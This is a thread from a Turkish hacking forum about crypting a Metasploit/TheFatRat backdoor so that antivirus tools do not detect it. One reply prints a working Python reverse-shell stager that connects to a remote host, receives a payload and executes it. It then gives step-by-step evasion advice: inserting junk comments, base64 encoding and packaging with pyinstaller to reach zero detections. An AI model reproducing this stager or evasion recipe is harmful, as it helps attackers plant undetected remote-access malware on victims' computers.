Metasploit Exploit Crypter [0/26] V.I.P

v for vandet

Katılımcı Üye
26 Kas 2020
261
103
bin\debug\
Merhaba,
Kali Linux'de TheFatRat ile oluşturulan .bat arka kapı virüsü 6/26 çıkıyor normalde,
ben de kendi kod bilgimle bi crypter yaptım ve sonuç 0/26 çıktı + sorunsuz çalışıyor. Client'de herhangi bir bozulma yok!

lrpj7uw.PNG


Crypter testi:

kafanıza takılan soruları buradan sorabilirsiniz veya p.m ye​
 

Pelacanus

Katılımcı Üye
28 Haz 2020
462
140
Thefatrat sürekli güncelleme aldıgı ıcın oldukca iyi bir araç. fudlamak aslında okadarda zor degil eger programlama dili biliyorsan... Fudlama işlemleri genellikle sağ kulağını sağ elinle değilde sol elinle tutmak gibidir. Eğer bir virusu fudlamak istiyorsan antivirus programlarının nasıl çalıstıgını bilmek gerekir. Antiviruslerin databasesinde örnek vermek gerekirse a harfi oldugunu düşünün siz a harfini A şeklinde yazarsanız aynı işleme sahip olacak fakat antivirus programları bunu goremeyecek. Bir örnek daha verelim mesela msfvenom yardımıyla python payload olusturalım oluşturdugun payloadı actıgında base64 ile sifrelenmiş olacagını goreceksiniz. Bu şifreyi decode edip kodlara baktıgımızda soyle gozukecektir.

import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('192.168.0.1',3333))
l=struct.unpack('>I',s.recv(4))0
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(d,{'s':s})

biz bu kodların arasına not amaçlı kelimeler bırakalım

#True
import socket,struct
#DANK
s=socket.socket(2,socket.SOCK_STREAM)
#WOW
s.connect(('192.168.0.1',3333))
#YOU HAD ONE JOB
l=struct.unpack('>I',s.recv(4))0
#NICE AV
d=s.recv(l)
#LOL NEVER MIND
while len(d)<l:
d+=s.recv(l-len(d))
#WHOA
exec(d,{'s':s})

daha sonra base64 ile encode edip txt üzerine kopyalayıp .py uzantılı kaydedelim.

şimdi geldi işin exe tarafına.. Bunu yapabilmek için py2exe veya pyinstaller araçlarına ihtiyacımız var. Kurulumunu vs anlatmıyorum. Gözlemlediğim kadarıyla py2exe ile yaptıgım payloadı 2 antivirus yakalarken, pyinstaller ile yaptıgımı 0 antivirus yakaladı. Deneme yapmak lazım bazen. Bunu yaklasık 1 sene once yaptım. Gayet başarılı calışıyordu fakat gecenlerde denediğimde 6 adet antivirus yakaladı. Bilgisiz arkadaşlarımız virustotal gibi sitelere yukledikleri için artık kullanılamaz hale geliyor. E tabi ne demiştik sağ kulağımızı sol elden tutmak gerekir bazen. Python bilgisi olan arkadaşlar aynı işlevi farklı kodlar ile yazarsa yine %100 fud olacaktır. İyi forumlar
 

PS1K0

Uzman üye
6 Ağu 2015
1,143
14
root@kali
Peki bu sonuçların hepsi Runtime olarakmı yoksa sadece Scantime mı? yani Defenderi açık olan bir bilgisayarda sorunsuz çalışıp bağlantı alabiliyormusun?
 

Whisperingofficial

Yeni üye
2 Eyl 2021
7
3
21
Merhaba,
Kali Linux'de TheFatRat ile oluşturulan .bat arka kapı virüsü 6/26 çıkıyor normalde,
ben de kendi kod bilgimle bi crypter yaptım ve sonuç 0/26 çıktı + sorunsuz çalışıyor. Client'de herhangi bir bozulma yok!

lrpj7uw.PNG


Crypter testi:

kafanıza takılan soruları buradan sorabilirsiniz veya p.m ye​
insanlar virüs totale daha çok güveniyor onuda ss atsana bence onuda full clean yaparsın
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.